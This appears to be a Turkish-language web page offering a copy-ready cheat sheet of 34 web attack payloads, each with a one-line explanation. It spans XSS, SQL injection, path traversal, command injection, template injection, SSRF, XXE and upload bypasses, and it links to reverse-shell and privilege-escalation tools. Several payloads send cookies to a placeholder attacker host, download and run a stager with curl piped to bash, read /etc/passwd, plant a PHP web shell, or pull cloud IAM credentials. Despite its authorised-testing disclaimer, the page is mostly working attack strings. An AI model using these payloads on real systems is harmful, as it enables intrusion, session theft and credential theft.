MagmaNex LogoMagmaNex

Web Saldırı Payload Referansı

XSS, SQL injection, LFI, komut enjeksiyonu, SSTI, SSRF ve XXE için açıklamalı, aranabilir payload referansı. Tek tık kopya.

🎯 Web uygulama testleri için açıklamalı payload referansı. Bir kategori seç ya da ara; her payload’un ne yaptığı yanında.

34 payload

XSS

<script>alert(document.domain)</script>

Klasik reflected/stored XSS kanıtı — mevcut domaini gösterir.

"><img src=x onerror=alert(1)>

Bir attribute’tan çıkıp onerror tetikler — <script> filtreliyse işe yarar.

<svg/onload=alert(1)>

Kısa, etiket tabanlı; çoğu basit filtreyi atlatır.

javascript:fetch('//ATTACKER/c?'+document.cookie)

javascript: URI ile çerez sızdırma (href/redirect noktaları).

'-alert(1)-'

Tek tırnaklı JS string bağlamından çıkar.

SQL Injection

' OR '1'='1' -- -

Kimlik doğrulama atlatma — WHERE her zaman doğru olur.

' UNION SELECT NULL,version(),NULL -- -

Sütun sayısını bildiğinde UNION ile veri çekme.

' ORDER BY 5 -- -

Hata verene kadar artırarak sütun sayısını bul.

' AND SLEEP(5) -- -

Zaman tabanlı blind test — 5s gecikme enjeksiyonu doğrular.

' AND 1=CONVERT(int,(SELECT @@version)) -- -

MSSQL’de tür dönüşüm hatasıyla error-based veri çekme.

1; SELECT pg_sleep(5)-- -

Yığılmış sorgu ile zaman gecikmesi (PostgreSQL).

LFI / Path Traversal

../../../../etc/passwd

Dizinlerde yukarı çıkarak yerel dosya oku.

....//....//....//etc/passwd

Çiftlenmiş dizilerle basit ../ temizliğini atlat.

php://filter/convert.base64-encode/resource=index.php

PHP kaynağını (çalıştırmadan) base64 oku — kimlik bilgileri sızar.

/var/log/apache2/access.log

Log poisoning hedefi — User-Agent ile PHP enjekte edip include et.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+

allow_url_include açıkken data:// wrapper ile RCE.

Command Injection

; id

Meşru komuttan sonra komut zincirle (Unix).

| whoami

Çıktıyı pipe et — ; filtreliyken bile çalışır.

$(curl ATTACKER/s|bash)

Komut ikamesiyle stager indirip çalıştır.

`ping -c1 ATTACKER`

Backtick çalıştırma — DNS/ICMP ile blind enjeksiyonu doğrula.

%0a id

Yeni satır enjeksiyonu bazı filtreleri atlatır.

SSTI (Template Injection)

${7*7}

Tespit denemesi — şablon motoru değerlendirirse 49 basar.

{{7*7}}

Jinja2/Twig tespiti — 49 sunucu tarafı değerlendirmeyi doğrular.

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Python nesne gezintisiyle Jinja2 RCE.

{{7*7}}[[5*5]]

Jinja2 ({{}}) ile Twig/diğer söz dizimlerini ayırt et.

SSRF

http://169.254.169.254/latest/meta-data/iam/security-credentials/

AWS metadata uç noktası — instance IAM kimlik bilgilerini çal.

http://127.0.0.1:80/

localhost’a bağlı iç servislere eriş.

http://[::1]/

127.0.0.1 kara listesini atlatmak için IPv6 loopback.

http://2130706433/

127.0.0.1’in ondalık IP’si — string filtrelerini atlatır.

XXE

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>

Yerel dosyayı yanıta okuyan harici varlık (entity).

<!ENTITY % p SYSTEM "http://ATTACKER/evil.dtd">%p;

Out-of-band XXE — yanıt blind iken veri sızdır.

Auth / Redirect / Upload

//attacker.com/%2f..

Çoğu URL doğrulayıcının kaçırdığı open-redirect atlatma.

shell.php.jpg / shell.pHp / shell.php%00.jpg

Yükleme filtresi atlatma (çift uzantı, büyük/küçük harf, null byte).

X-Forwarded-For: 127.0.0.1

IP-kısıtlı admin panellerine ulaşmak için kaynak IP taklidi.

⚠️ Yalnızca yetkili olduğun, izinli hedeflerde kullan. Yer tutucuları (URL, FILE…) kendi değerlerinle değiştir.

Bu araç ne işe yarar?

Web Attack Payloads Reference, web uygulama testleri için kategoriye göre düzenlenmiş, aranabilir ve açıklamalı bir payload kütüphanesidir: XSS, SQL injection, LFI/path traversal, komut enjeksiyonu, SSTI (template injection), SSRF, XXE ve auth/redirect/upload bypass'ları. Her payload, ne yaptığını ve ne zaman kullanılacağını anlatan tek satırlık bir açıklamayla gelir. Tümü tarayıcıda çalışır, hiçbir veri sunucuya gönderilmez ve yalnızca yetkili testler için tasarlanmıştır.

Nasıl kullanılır?

  1. Dinleyici IP ve portunuzu girin.
  2. İhtiyacınıza uygun komutu veya payload'u seçin.
  3. Komutu kopyalayıp yalnızca yetkili olduğunuz sistemlerde kullanın.

Ne işe yarar?

Bug bounty, web pentest ve OSCP sırasında her açık sınıfı için doğru ilk-deneme payload'larını hatırlamak zordur. Bu referans kategoriye göre filtrelenir, hızlı arama yapılır ve her payload'ın amacını açıklar; böylece körü körüne kopyalamak yerine ne test ettiğinizi bilirsiniz. Yer tutucuları (URL, dosya yolu, komut) kendi hedefinize göre değiştirin.

Yalnızca yetkili test

Buradaki payload'lar yalnızca açıkça izin verilen sistemlerde, kapsam (scope) dahilinde kullanılmalıdır; izinsiz test çoğu ülkede suçtur. Üretim ortamında SQLi ve komut enjeksiyonu gibi yıkıcı yüklere dikkat edin ve önce zararsız tespit payload'larını ('{{7*7}}', tek tırnak) tercih edin. Sorumlu açıklama (responsible disclosure) ilkelerine uyun.

Sıkça sorulan sorular

Bu payload'ları nasıl kullanırım?

İlgili kategoriyi seçin, payload'ı kopyalayın ve yer tutucularını (hedef URL, dosya yolu, dinleyici, komut) kendi değerlerinizle değiştirin. Yalnızca test etme izniniz olan, kapsam dahilindeki hedeflerde çalıştırın.

SSTI nedir, nasıl tespit edilir?

SSTI (Server-Side Template Injection), kullanıcı girdisinin bir şablon motoruna (Jinja2, Twig, Freemarker) doğrudan geçmesiyle oluşur ve genellikle RCE'ye yol açar. Klasik tespit yöntemi matematiksel bir ifade enjekte etmektir: girdiye '{{7*7}}' yazdığınızda yanıtta '49' görüyorsanız şablon enjekte ediliyor demektir.

SSRF nedir ve AWS metadata endpoint'i ne işe yarar?

SSRF (Server-Side Request Forgery), sunucuyu saldırganın seçtiği bir adrese istek yapmaya zorlar ve iç ağ kaynaklarına erişim sağlar. Bulut ortamlarında klasik hedef AWS metadata servisidir (169.254.169.254); IMDSv1 açıksa buradan geçici IAM kimlik bilgileri sızdırılabilir.

Web Saldırı Payload Referansı ücretsiz mi?

Evet. Web Saldırı Payload Referansı ve MagmaNex'teki 300'den fazla aracın tamamı tamamen ücretsizdir, kayıt veya üyelik gerektirmez.

Verilerim güvende mi?

Evet. Tüm işlemler tarayıcınızda yerel olarak çalışır. Girdiğiniz veriler sunucuya gönderilmez, kaydedilmez veya paylaşılmaz.

Mobil cihazda çalışır mı?

Evet. Web Saldırı Payload Referansı telefon, tablet ve bilgisayarda sorunsuz çalışır; ayrı bir uygulama indirmenize gerek yoktur.

🔒 Gizlilik: Tüm işlemler tarayıcınızda yapılır, verileriniz sunucuya gönderilmez.

İlgili Araçlar

Reverse Shell ÜreticiNew

IP ve port girin; bash, python, nc, PowerShell ve daha fazlası için tek satırlık reverse shell komutları üretin.

Nmap Komut OluşturucuNew

Tarama tipi, port, hız ve NSE seçeneklerini tıklayarak hazır nmap komutu oluşturun.

Msfvenom Payload OluşturucuNew

Platform, payload, LHOST/LPORT ve format seçerek msfvenom komutunuzu oluşturun.

Hashcat Komut OluşturucuNew

Hash tipi, saldırı modu, wordlist ve mask seçerek hashcat komutu oluşturun.

Unix Yetki Yükseltme ReferansıNew

Unix/Linux binary’leriyle shell kaçışı, SUID/sudo yetki yükseltme, dosya okuma/yazma ve capability tekniklerini arayın. Açıklamalı, aranabilir referans.

Windows Yetki Yükseltme ReferansıNew

Token (SeImpersonate/Potato), servis yanlış yapılandırmaları, AlwaysInstallElevated, registry, zamanlanmış görev, DLL hijack, UAC bypass ve kimlik bilgisi tekniklerini arayın. Açıklamalı.

📝 İlgili Yazılar

Popüler Araçlar